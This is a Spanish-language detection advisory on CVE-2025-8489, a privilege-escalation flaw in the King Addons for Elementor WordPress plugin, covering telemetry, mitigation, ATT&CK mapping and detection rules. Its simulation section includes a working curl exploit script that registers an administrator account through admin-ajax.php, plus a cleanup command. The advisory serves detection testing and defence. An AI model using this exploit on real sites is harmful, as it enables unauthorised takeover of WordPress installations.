Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una falla crítica de escalada de privilegios sin autenticación (CVE-2025-8489) en el plugin King Addons para Elementor de WordPress permite a los atacantes registrar nuevos usuarios con privilegios de administrador. El error ha estado bajo explotación activa desde el 31 de octubre de 2025, con Wordfence bloqueando decenas de miles de intentos. Los atacantes explotan el problema a través de solicitudes POST elaboradas enviadas al punto final admin-ajax.php. Las versiones 24.12.92 hasta 51.1.14 están afectadas, con una corrección disponible en la versión 51.1.35.
Investigación
La telemetría de Wordfence registró más de 48,400 intentos de explotación, con un notable aumento el 9-10 de noviembre de 2025. La dirección IPv6 fuente más activa fue 2602:fa59:3:424::1. Las cargas útiles maliciosas utilizan datos HTTP POST que establecen el parámetro user_role a administrador durante el flujo de trabajo de registro. No se observó un despliegue adicional de malware más allá de la creación de cuentas de administrador fraudulentas.
Mitigación
Actualice King Addons para Elementor a la versión 51.1.35 o más reciente. Habilite las protecciones del firewall de Wordfence que se enviaron el 4 de agosto de 2025 (premium) y el 3 de septiembre de 2025 (gratuita). Audite las listas de usuarios de WordPress en busca de cuentas de administrador inesperadas y revise continuamente los registros para detectar el patrón POST sospechoso.
Respuesta
Actívelas alertas en el tráfico POST hacia /wp-admin/admin-ajax.php que incluya user_role=administrator. Bloquee las direcciones IP abusivas, prestando especial atención a la dirección IPv6 destacada. Realice comprobaciones de higiene de cuentas y elimine cualquier usuario administrador no autorizado. Despliegue firmas IDS basadas en host afinadas a la estructura de solicitud observada.
graph TB %% Class definitions Section classDef technique fill:#ffcc00 %% Node definitions tech_exploit_public_facing[«<b>Técnica</b> – <b>T1190 Explotación de Aplicación de Cara al Público</b><br/>Los adversarios explotan una aplicación expuesta públicamente para obtener acceso inicial.»] class tech_exploit_public_facing technique tech_exploitation_priv_esc[«<b>Técnica</b> – <b>T1068 Explotación para Escalada de Privilegios</b><br/>Los adversarios explotan una vulnerabilidad de software para aumentar sus privilegios en el sistema.»] class tech_exploitation_priv_esc technique tech_account_manipulation[«<b>Técnica</b> – <b>T1098 Manipulación de Cuentas</b><br/>Los adversarios crean, modifican o eliminan cuentas para lograr sus objetivos.»] class tech_account_manipulation technique tech_valid_accounts[«<b>Técnica</b> – <b>T1078 Cuentas Válidas</b><br/>Los adversarios obtienen y utilizan credenciales legítimas para acceder a cuentas.»] class tech_valid_accounts technique %% Edge connections showing attack flow tech_exploit_public_facing u002du002d>|leads_to| tech_exploitation_priv_esc tech_exploitation_priv_esc u002du002d>|leads_to| tech_account_manipulation tech_account_manipulation u002du002d>|leads_to| tech_valid_accounts
Flujo de Ataque
Detecciones
Explotación de la Escalada de Privilegios de King Addons para Elementor [Servidor Web]
Ver
IOCs (SourceIP) para detectar: Atacantes Explotando Activamente Vulnerabilidad Crítica en el Plugin King Addons para Elementor
Ver
IOCs (DestinationIP) para detectar: Atacantes Explotando Activamente Vulnerabilidad Crítica en el Plugin King Addons para Elementor
Ver
Posible intento de explotación CVE-2025-8489 (Escalada de Privilegios en WordPress King Addons) (a través de servidor web)
Ver
Ejecución de Simulación
Requisito previo: La Verificación Pre‑vuelo de Telemetría y Línea Base debe haberse aprobado.
-
Narrativa del Ataque y Comandos:
Un adversario descubre CVE‑2025‑8489 en el plugin King Addons para Elementor. Elabora una solicitud POST aadmin-ajax.phpque incluye elparámetro action=king_addons_user_register(requerido por el plugin) and fuerza el rol del nuevo usuario aadministradora través deuser_role=administrator. Al enviar esta solicitud directamente al punto final vulnerable, el atacante obtiene una cuenta privilegiada de WordPress sin necesidad de autenticación previa. La carga útil está codificada en URL para replicar un cliente web realista. -
Script de Prueba de Regresión:
#!/usr/bin/env bash # Script de explotación para la escalada de privilegios de King Addons para Elementor (CVE‑2025‑8489) TARGET="http://webserver.example.com" ENDPOINT="/wp-admin/admin-ajax.php" # Datos POST elaborados (codificados en URL) POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator" echo "[*] Enviando carga útil de explotación..." curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" -H "Content-Type: application/x-www-form-urlencoded" --data "${POST_DATA}" echo -e "n[+] Explotación enviada. Verifique el SIEM para la alerta generada." -
Comandos de Limpieza:
# Eliminar el usuario malicioso creado durante la prueba curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')" echo "[*] Limpieza completada."